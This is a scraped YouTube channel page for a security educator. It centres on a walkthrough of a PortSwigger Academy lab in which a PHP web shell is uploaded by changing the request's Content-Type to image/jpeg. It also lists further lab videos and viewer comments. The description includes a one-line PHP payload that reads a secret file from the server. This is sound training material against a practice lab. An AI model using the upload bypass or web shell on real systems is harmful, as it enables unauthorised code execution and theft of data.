- 52
- 83 866
Popo Hack
Tunisia
เข้าร่วมเมื่อ 22 เม.ย. 2022
Helping you to get into the cybersecurity field and be the best hacker. I am Nabil Popo a Cybersecurity Researcher and Bug Bounty Hacker 🧑💻
In my channel I am providing you several of high quality, quick and simple tutorials on technology involving CTFs, pentesting, networking scanning and more! In easy way and easy English for all levels from beginners to experts.
My mission is to make education and problem-solving easy and simple for everyone. 🛸
Feel free to ask me many kind of questions or ask me for help 🚀
😀 Follow me to learn more ➡️ bit.ly/3TplFRN ✅
In my channel I am providing you several of high quality, quick and simple tutorials on technology involving CTFs, pentesting, networking scanning and more! In easy way and easy English for all levels from beginners to experts.
My mission is to make education and problem-solving easy and simple for everyone. 🛸
Feel free to ask me many kind of questions or ask me for help 🚀
😀 Follow me to learn more ➡️ bit.ly/3TplFRN ✅
Portswigger - File upload - Lab #2 Web shell upload via Content Type restriction bypass
Hello Hackers, in this video of Remote code execution via web shell upload. You will see how to exploit, discover and find senstive information based on Remote code execution to leak senstive information from Burp Suite in a lab from Web Security Academy powered by Portswigger
⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️
0:00 - About the Lab
1:10 - About Php documentation of File System Related Extensions
1:30 - Map the application
2:15 - Exploit update avatar function
4:44 - discover the file server endpoint
5:28 - Write RCE code based on Php
7:08 - Change Content-Type
8:17 - Phpinfo page
9:00 - Use file_get_contents()
🔍 About the Lab
Lab: Web shell upload via Content-Type restriction bypass
Level: Practitioner
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
🔗 Resources
PHP Documentation:
www.php.net/manual/en/book.filesystem.php
Remote Code Execution (RCE) definition:
www.cloudflare.com/learning/security/what-is-remote-code-execution/
✅ What to do ?
1. Log in and upload an image as your avatar, then go back to your account page.
2. In Burp, go to Proxy then HTTP history and notice that your image was fetched using a GET request to /files/avatars/YOUR-IMAGE. Send this request to Burp Repeater.
3. On your system, create a file called exploit.php, containing a script for fetching the contents of Carlos's secret. For example:
echo file_get_contents('/home/carlos/secret');
4. Attempt to upload this script as your avatar. The response indicates that you are only allowed to upload files with the MIME type image/jpeg or image/png.
5. In Burp, go back to the proxy history and find the POST /my-account/avatar request that was used to submit the file upload. Send this to Burp Repeater.
6. In Burp Repeater, go to the tab containing the POST /my-account/avatar request. In the part of the message body related to your file, change the specified Content-Type to image/jpeg.
7. Send the request. Observe that the response indicates that your file was successfully uploaded.
8. Switch to the other Repeater tab containing the GET /files/avatars/YOUR-IMAGE request. In the path, replace the name of your image file with exploit.php and send the request. Observe that Carlos's secret was returned in the response.
9. Submit the secret to solve the lab.
Thank you for watching my video, if you have any questions or any topics recommendation feel free to write them on the comment below 🙋
#WebSecurityAcademy #portswigger #vulnerability
⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️
0:00 - About the Lab
1:10 - About Php documentation of File System Related Extensions
1:30 - Map the application
2:15 - Exploit update avatar function
4:44 - discover the file server endpoint
5:28 - Write RCE code based on Php
7:08 - Change Content-Type
8:17 - Phpinfo page
9:00 - Use file_get_contents()
🔍 About the Lab
Lab: Web shell upload via Content-Type restriction bypass
Level: Practitioner
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
🔗 Resources
PHP Documentation:
www.php.net/manual/en/book.filesystem.php
Remote Code Execution (RCE) definition:
www.cloudflare.com/learning/security/what-is-remote-code-execution/
✅ What to do ?
1. Log in and upload an image as your avatar, then go back to your account page.
2. In Burp, go to Proxy then HTTP history and notice that your image was fetched using a GET request to /files/avatars/YOUR-IMAGE. Send this request to Burp Repeater.
3. On your system, create a file called exploit.php, containing a script for fetching the contents of Carlos's secret. For example:
echo file_get_contents('/home/carlos/secret');
4. Attempt to upload this script as your avatar. The response indicates that you are only allowed to upload files with the MIME type image/jpeg or image/png.
5. In Burp, go back to the proxy history and find the POST /my-account/avatar request that was used to submit the file upload. Send this to Burp Repeater.
6. In Burp Repeater, go to the tab containing the POST /my-account/avatar request. In the part of the message body related to your file, change the specified Content-Type to image/jpeg.
7. Send the request. Observe that the response indicates that your file was successfully uploaded.
8. Switch to the other Repeater tab containing the GET /files/avatars/YOUR-IMAGE request. In the path, replace the name of your image file with exploit.php and send the request. Observe that Carlos's secret was returned in the response.
9. Submit the secret to solve the lab.
Thank you for watching my video, if you have any questions or any topics recommendation feel free to write them on the comment below 🙋
#WebSecurityAcademy #portswigger #vulnerability
มุมมอง: 67
วีดีโอ
Portswigger - File upload - Lab #1 Remote code execution via web shell upload
มุมมอง 153หลายเดือนก่อน
Hello Hackers, in this video of Remote code execution via web shell upload. You will see how to exploit, discover and find senstive information based on Remote code execution to leak senstive information from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:12 - About Remote Code Execution (RCE) 2:07 - Exampl...
Portswigger - Access Control - Lab #13 Referer based access control
มุมมอง 1012 หลายเดือนก่อน
Hello Hackers, in this video of Referer based access control. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:38 - About Referer Header 1:49 - Discover Admin account 2:45 - T...
Portswigger - Access Control - Lab #12 Multi step process with no access control on one step
มุมมอง 552 หลายเดือนก่อน
Hello Hackers, in this video of Multi step process with no access control on one step. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:32 - Discover Admin account 2:15 - Test...
Portswigger - Access Control - Lab #11 Method based access control can be circumvented
มุมมอง 742 หลายเดือนก่อน
Hello Hackers, in this video of Method based access control can be circumvented. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:40 - About HTTP request methods 1:12 - Discov...
Portswigger - Access Control - Lab #10 URL based access control can be circumvented
มุมมอง 933 หลายเดือนก่อน
Hello Hackers, in this video of URL based access control can be circumvented. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:50 - What's X-Original-URL header? 2:24 - Check ...
Portswigger - Access Control - Lab #9 Insecure direct object references (IDOR)
มุมมอง 1483 หลายเดือนก่อน
Hello Hackers, in this video of insecure direct object references (IDOR). You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:25 - What's IDOR ? 2:31 - Test live chat 3:38 - Chec...
Portswigger - Access Control - Lab #8 User ID controlled request parameter with password disclosure
มุมมอง 963 หลายเดือนก่อน
Hello Hackers, in this video of User ID controlled by request parameter with password disclosure. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:03 - Log-in as Wiener user 1...
Portswigger - Access Control - Lab #7 User ID controlled by req params with data leakage in redirect
มุมมอง 744 หลายเดือนก่อน
Hello Hackers, in this video of User ID controlled by request parameter with data leakage in redirect. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:53 - Log-in as Wiener u...
Portswigger - Access Control - Lab #6 User ID controlled by request parameter with unpredictable use
มุมมอง 1784 หลายเดือนก่อน
Hello Hackers, in this video of User ID controlled by request parameter with unpredictable use. You will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:37 - About Globally Unique Ide...
Portswigger - XSS - Lab #3 DOM XSS in document write sink using source location search
มุมมอง 1594 หลายเดือนก่อน
Hello Hackers, in this video of DOM XSS in document write sink using source location search will see how to exploit, discover and find senstive information based on application Cross-Site Scripting to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:53 - Discover the blog 2:17 ...
Portswigger - XSS - Lab #2 Stored XSS into HTML context with nothing encoded
มุมมอง 1105 หลายเดือนก่อน
Hello Hackers, in this video of Stored XSS into HTML context with nothing encoded will see how to exploit, discover and find senstive information based on application Cross-Site Scripting to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:08 - Discover the blog 1:48 - Test com...
Portswigger - XSS - Lab #1 Reflected XSS into HTML context with nothing encoded
มุมมอง 1885 หลายเดือนก่อน
Hello Hackers, in this video of Reflected XSS into HTML context with nothing encoded will see how to exploit, discover and find senstive information based on application Cross-Site Scripting to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:35 - Explore Inspector and console ...
Portswigger - Access Control - Lab #5 User ID controlled by request parameter
มุมมอง 1565 หลายเดือนก่อน
Hello Hackers, in this video of User ID controlled by request parameter will see how to exploit, discover and find senstive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:29 - Explaining Escalation Methods 1:57 - Log-in as Wiener...
Portswigger - Information Disclosure - Lab #5 Information disclosure in version control history
มุมมอง 2515 หลายเดือนก่อน
Hello Hackers, in this video of Information disclosure in version control history you will see how to exploit, discover and find senstive information to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:37 - About Git and Version Control System 2:24 - Github - Git Cheat Sheet 2:...
Portswigger - Access Control - Lab #4 User role can be modified in user profile
มุมมอง 1886 หลายเดือนก่อน
Portswigger - Access Control - Lab #4 User role can be modified in user profile
Portswigger - Access Control - Lab #3 User role controlled by request parameter
มุมมอง 2456 หลายเดือนก่อน
Portswigger - Access Control - Lab #3 User role controlled by request parameter
Portswigger - Access Control - Lab #2 Unprotected admin functionality with unpredictable URL
มุมมอง 1946 หลายเดือนก่อน
Portswigger - Access Control - Lab #2 Unprotected admin functionality with unpredictable URL
Portswigger - Access Control - Lab #1 Unprotected admin functionality
มุมมอง 2.9K9 หลายเดือนก่อน
Portswigger - Access Control - Lab #1 Unprotected admin functionality
Portswigger - Business Logic - Lab #2 High level logic vulnerability
มุมมอง 62510 หลายเดือนก่อน
Portswigger - Business Logic - Lab #2 High level logic vulnerability
Portswigger - Business Logic - Lab #1 Excessive trust in client side controls
มุมมอง 83110 หลายเดือนก่อน
Portswigger - Business Logic - Lab #1 Excessive trust in client side controls
Portswigger - Information Disclosure - Lab #4 Authentication bypass via information disclosure
มุมมอง 1.7K10 หลายเดือนก่อน
Portswigger - Information Disclosure - Lab #4 Authentication bypass via information disclosure
Portswigger - Information Disclosure - Lab #3 Source code disclosure via backup files
มุมมอง 97110 หลายเดือนก่อน
Portswigger - Information Disclosure - Lab #3 Source code disclosure via backup files
Portswigger - Information Disclosure - Lab #2 Information disclosure on debug page
มุมมอง 1.2K11 หลายเดือนก่อน
Portswigger - Information Disclosure - Lab #2 Information disclosure on debug page
Portswigger - Information Disclosure - Lab #1 Information disclosure in error messages
มุมมอง 93111 หลายเดือนก่อน
Portswigger - Information Disclosure - Lab #1 Information disclosure in error messages
Portswigger - API Testing - Lab #5 Exploiting server side parameter pollution in a REST URL
มุมมอง 1.3K11 หลายเดือนก่อน
Portswigger - API Testing - Lab #5 Exploiting server side parameter pollution in a REST URL
Portswigger - API Testing - Lab #4 Exploiting a mass assignment vulnerability
มุมมอง 2.3K11 หลายเดือนก่อน
Portswigger - API Testing - Lab #4 Exploiting a mass assignment vulnerability
Portswigger - API Testing - Lab #3 Finding and exploiting an unused API endpoint
มุมมอง 3.9K11 หลายเดือนก่อน
Portswigger - API Testing - Lab #3 Finding and exploiting an unused API endpoint
Portswigger - API Testing - Lab #2 Exploiting server side parameter pollution in a query string
มุมมอง 4.8Kปีที่แล้ว
Portswigger - API Testing - Lab #2 Exploiting server side parameter pollution in a query string
Portswigger - API Testing - Lab #1 Exploiting an API endpoint using documentation
มุมมอง 8Kปีที่แล้ว
Portswigger - API Testing - Lab #1 Exploiting an API endpoint using documentation
Very useful!
Thank you 😇
i got this: please help "GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 10.0.4.28 2024-12-16 07:17:21 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 39.56.209.123 2024-12-16 07:17:22 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 39.56.209.123 2024-12-16 07:17:22 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 39.56.209.123 2024-12-16 07:17:25 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
let me let me let me let me aaaaaaaaaaaaa😡😡😡😡
/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 :<
Hello my friend What's the problem exactly ?
same problem, if yours work please reply
@@popo_hack 'Resource not found' instead of key
same for me
try putting before any url you're using
Can you *please* pronounce the terminology correctly and not confuse the green hats who have to watch this video from Port Swigger's site? You are especially confusing the green hats whose native language is not English. Interceptor not introspector. It is extremely frustrating to know that some people who are considered experts, are getting the terminology wrong. If you are going to be an educator, know your discipline.
Hello my friend 😊 Thank you for pointing this out. English is my third language, and I understand that I may make mistakes. I’ll work on improving my pronunciation and terminology in future videos. I appreciate your feedback! Happy hack ^^
Are inql scanner timer and attacker extensions??
InQl is an extension provided by Portswigger community but I am not sure I understand your question about Timer and Attacker. You can check the list of all extensions supported by Burpsuite portswigger.net/bappstore
I'm trying to complete this lab and I can't do it for 2 hours. I'm doing exactly as you did, but in acess log it shows me the api key of this wiener user instead of admisitrator. Maybe you have any idea what is the reason for this?
Hello my friend 😊 Please check how I wrote the code from the video and then copy it go to the Expolit Server > paste your code > Save > delivred to the victim If this doesn't work to you you might close the lab then re-do after while I hope this can help you Happy Hack ^^
@@popo_hack Hi! Thank you for the response. But I did it exactly as you told, several times. And it still doesn't work as expected :(
after few more retries it finally worked, thank you!
@mykhailodudka5324 that's so bad. You might try to log out as Wiener user and re-do it again if this solution doesn't work for you this's maybe a bug from Web Security Academy you can report them to check the problem with you. I hope you find a way my friend
@mykhailodudka5324 Ooo great news 🤗 happy for you my friend 😁 Best of luck in your learning journey
thank you myfriend you are awesome
Welcome my friend 😊 thank you so much I really appreciate it 😇 Happy hack ^^
Thank God.. Now I got it👍
Happy for you my friend 😄If you like those kind of content don't forget to subscribe to my channel to be up to date for new coming videos 😁 Happy hack ^^
This lab was really difficult 😢
Hello my friend 😊 Yes, this lab is little bit harder than others Best of luck. If you're interesting about those kind of videos don't forget to subscribe to my channel to be up to date for new videos
🔥
Always the first in comment 😁
nice job
Thank you so much my friend 😊 I really appreciate your words. If you want to see more like this video please don't forget to subscribe to my channel to be up to date for new videos 😇
hello, popo. Are you have a video doing IDOR in real ambient?
Hello friend again 😊 Actually, I don't do that kind of videos they're no legal to share. If you do an IDOR it should be always for ethical reason. You can read some writes about it where ethical hacker share their found on Hackerone.com
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
how can i see the access log in real bug after transfer it via burp suit
Hello my friend 😁 In real live you might build you own server where it is hosted on cloud. You might use NodeJs, Laravel, Django or any backend server to build it. So in this where have server that provided by Web Security Academy for a test. If you like those kind of video please don't forget to subscribe to my channel to be up to date for new videos 😁 Happy hack ^^
Many thanks for you reply I do now
@acceshopping7360 absolutely welcome my friend 😊 ask me at anytime you Happy hack ^^
I have a friend that he is a hacker, and i 'm withou money but i like cybersecurity. So , he told me for study IDOR at Portswigger that have so much bug bounty IDOR, because the hackers dislikes because haven't automation. So he saied: if you learning IDOR, you get 800 USD per month or more. Is possible, every month?
Hello, my friend 😊 Actually, IDOR is one of the most famous bugs on the internet, but to find one, you need to practice more in different scenarios. It's possible to find a bug like IDOR, but it's not that easy-you might learn about other types of bugs along the way. Best of luck in your hacking journey! I hope you succeed. Happy hack ^^
Thank you for the taking the time to walk us through this. I learned more here than my college!
Hello my friend 😁 I happy to hear that from you. I hope you learn more from my videos. I do my best to provide an easy way to teach 😊 Don't forget to subscribe to my channel to be up to date for new videos Happy hack ^^
Great Content, I had to look at the solution for this lab and thought I would never think of that but you've laid it out clearly with logical steps and now I can see why someone would follow the solution steps. Subscribed :)
Hello my friend 😊 I really appreciate your words 😇 I am happy that you liked my content and the way I teach. I try to make cybersecurity easy to everyone and thank you for your comment and your subscription 😁 Happy hack ^^
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
Congratulations 👏 on 1K subs
Thank you my friend 😁
Yooo ❤ mate is back I'm in the office right now and will watch it as soon as I get time. Love the new series of file uploads
Happy to see you my friend 🌸
Why didn't the price change when you added the item_price in 4:34.
Hello my friend 😄 Can you be more specified? What price is changed ? Do you mean the Total Price or Item Price ? If your answer is 'Total Price' the Total Price changed because we used the injected the chosen_dsicount to have 100% discount to get the item for free. If your answer is 'Item Price' it might be change but it has not impact in the final purchase because there's backend check of item price. If you liked the content, feel free to subscribe to the channel for more videos like this. Your support means a lot! 😁
@@popo_hack yeah already subscribed 😌. Thank you for clearing my doubt
You're welcome my friend 😊 Feel free to ask me any question you want Happy hack ^^
Nice vid - liked the way you tried to work towards a solution realistically and breakdown / explain your thought processes and items you were inspecting
Thank you so much for the kind comment! I’m glad you enjoyed the breakdown and explanations. If you liked the content, feel free to subscribe to the channel for more videos like this. Your support means a lot! 😇
Needed to install a newer java runtime following this, but useful info nonetheless
Happy to hear that my friend 😊
very nicely explained <3 but bro in real life how to get to this point ,, it would be very frustating task i guess
Hello my friend 😊 Thank you for you comment. Actually in real life this will be different the purpose of this video it to merge more types of attacks in one. It lets you think in different way to find bugs where the developement team might missed them. So my friend please don't forget to subscribe to my channel to be up to date for new videos 😁 Happy Hack ^^
Great work as always :) so what's next authentication or have plans to complete your other playlists
Hello my friend 😊 Happy to see you. My next serie will be File Upload Vulnerability 😁I will do the Authentification next to that 😁
@@popo_hack looking forward to it 🧨🥳
I really appreciate your words 🙏
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
😭😭😭funally! As an adhd learner i approve this vid 😭😭😭🎀
Hello my friend 😇 Happy to hear that, best of luck in your learning journey 😊 Please don't forget to subscribe to my channel to be up to date for new videos Happy Hack ^^
there is no need to change the csrf token and session id , simply login using the given cresentails and change the id name wiener to carlos ❤❤
can we say it is a kind of idor, where in idor we change the user id but here we change the name , but the exploitation is same and the the cause of occurrence is also same , where in idor the backend doesn't validate the session with the id, it simply give the output depending on the user supplied info
Hello my friend 😇 You're right it is a kind of IDOR vulnerability where you can make read or write on specific data. I talked more about this topic on next video you can watch it from here th-cam.com/video/QPVKbjyIOeE/w-d-xo.html So my friend if you like these kind of videos pleqse don't forget to subscribe to my channel to be up to date for new videos 😁 Happy Hack ^^
@@popo_hack love your content bro I am just revising the concept found your video very short precise and informative
Thank you so much! I’m glad you found the video helpful and precise. If you have any questions, feel free to let me know! 😊
I hope I get a response though. I'm getting an error message while using the wget -r and the url. It's saying unable to resolve host address. Any suggestions on how I can fix that? Thanks.
Hello my friend 😊 Can you please provide me more details. What is the error message ? And what is the full command that you used. In that time you can check that the command Linux by wget with /git endpoint should be like: wget -r example.com/git And if you get error relate to certificats you can add --no-check-certificate flagto be like: wget -r --no-check-certificate example.com/git I am waiting you to provide me with more details so I can help you Happy hack ^^
Awesome. Thanks for your job.
Welcome my friend 😊 happy to hear that 🌸 don't forget to watch the full serie my friend I will upload the last lab in next week stay tune 😇
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
I'm always the first to be here :)
Hello my friend 😁 You're so fast my friend hhh Thank you for your motivation, happy to see you everytime I upload a new video
@@popo_hack :) your videos remind me to complete more labs haha and I really love your energy 😁
@Aquax1000 hhh thank you my man 😁 I really like your comments too you my day as always 🙏😇
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
Thanks for uploading this popo :) I'm nowadays shifted to manual testing and I must say it does require a lot of understanding of the application in the real world targets.
Hello my friend 🤗 Happy to have you back again! Best of luck in your journey
@@popo_hack Thanks Popo I will let you know as soon as I find something interesting. Btw I'm mixing up Access control, logic Errors and Auth together but nowadays I'm having a really hard time with GrapQL as this is really something new for me
Good job my friend you're doing a great job. GraphQL is a part of API Testing you see both of my series in my channel they might help you 😊
{ "errors": [ { "path": [ "changeEmail" ], "extensions": { "message": "You must be logged in to change email" }, "locations": [ { "line": 1, "column": 50 } ], "message": "Exception while fetching data (/changeEmail) : You must be logged in to change email" } ], "data": { "changeEmail": null } } у меня код не работает помоги великий попо хак пожалуйста
Hello my friend 😇 In this error it means that you're not logged-in when you tested your code. Please check the your code with video. And try to test it on your own account first, if you are able to change your own email it means your code works fine if not double check it and rewrite again. If you don't have a knowledge in programming using Javascript you might have some difficulty.
so within the script where we are calling the host with subdomain, why do we need to use http instead of https?
Hello my friend again We use 'http' instead of 'https' in the example because the server and lab of Web Security Academy are hosted in the same host where they communicate with each other as the LOCALHOST domain (127.0.0.1) but in real life senario if you have you own server that hosted on cloud you will need to you 'https' 🤓
and also, I really like how you explain those steps exploiting each of the portswigger challenges
Thank you so much my friend I really appreciate your words and you like my content. Please don't forget to subscribe to my channel to be up to date for new videos 😁
Can I ask a question? When attempting to exploit this vulnerability, do we need to include the (attacker's server URL that contains the request file) in the Origin header of the request? Additionally, does the admin user need to click that endpoint for it to access the attacker's server?
Hello my friend 😇 Thank you for your comment. 1. Yes in real life situation attack include his server address to recieve the requests and reads the his serve's log to get the request data 2. Yes, the admin user (previliged user) has to click the link to send the request to the attacker's server This 2 thinks can only happen when application has CORS vulnerability where it leaks header and senstive data
Can u tell me where can i study for owasp top 10 web and moblie and where i can practice it Because topic tames is owasp is not clear names to just search for it and find labs to practice it There is some clear name like broken Access control and injection but the other i couldn't find where to study and practice them and top 10 mobile as well If u make video about that would be awesome thnax❤❤
Hello my friend 😇 First that you for your comment and your suggestion, I really appreciate those kind of ideas. The best place where you can learn more about Front-End vulnerabilities and Back-end vulnerabilities and many other topics you can check this websites: 1. Web Security Academy: portswigger.net/web-security/all-topics => this website is the same in my videos 2. TryHackMe: tryhackme.com/ => This website has more topic in Network, Mobile, OS and more 3. HackTheBox: www.hackthebox.com/ => This website is very popular where you practice you skills I home that I answered your question my friend, please don't forget to subscribe to my channel to be up to date for new videos 😊
Thanks popo ur videos as awesome ❤ plz don't stop. keep up . I found u on portswigger community solution and im very happy 😊
Hello friend 😊 I am very happy with those words 🙏 I am doing my best to upload new video every week, stay tune for new videos 😊
I was surprised, when you successfuly sent json body in GET :)
Hello my friend 😁 You can send a body in a GET request with GraphQL, but it is not recommended because GET requests are typically expected to be idempotent and use query parameters. However, some servers may allow it for convenience, though it goes against HTTP standards.
nice! thank you
Welcome my friend 😇 I am happy that you like my video. Don't forget to subscribe to my channel to be up to date for new videos 😀
какой пароль ,дружище,у меня киллер не подходит
@настоящийтурбовася hello my friend 😇 I translate you comment and I now I can answer you question of 'why the killer didn' t work as password' this because the password changes in each time you run the lab, so you need to write you own script as I did in the video to find the right password 😁 I hope that I answer your question my friend, please don't forget to subscribe to my channel to be up to date for new videos 😊
@@popo_hack hello my dear friend, thank you bro
@@popo_hack hello my dear friend, thank you bro
thank you!
Welcome my friend 😇🙏
I am getting a lot of 'noise' on my Websockets history, namely ping and pong messages, do you know if there is any way to stop these messages from bouncing back and forth please? I notice that you don't get them!
Hello my friend 😇 thabk you for your comment. If you get any extra messages from you browser this may you have recieved those messages from another server so maybe it cames from one of your extensions, try to clear your browser data and remove extra extensions that you don't need then try again and check 😄 I hope that answered your question, so if you like those kind of video don't forget to subscribe to my channel to be up to date for new videos 😁 Happy hack ^^
its cool bro loved it i am doing more to hunt more
Happy to hear that my friend I hope you learn more form my vidoes. Don't forget to subscribe to be up to date for new videos 😇
@@popo_hack done bro can you make more videos on os command injection dude i try at forms but didnt get and i saw differ reports they are doing unique i am doing bro but can you request
Hello my friend again 😁 Thank you for your suggestion actually I will do an OS Command injection serie after finishing my plan of videos and this can take some time so you can search on TH-cam about this topic and you will find hundreds video talking about that topic can help you to learn more 😇
@@popo_hack thanks bro yeah i have done all the things even i watched rana khali videos i love to learn from various guys so thats why 🤗
You're welcome 😇
Great!!
Thank you so much my friend 😇 I hope that you learned something from my video don't forget to watch the full serie of GraphQL to learn more 😊 Please don't forget to like the video, subscribe to my channel to be up to date for new videos 🌸
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
Again First :) ❤
Happy to see you my friend 🤩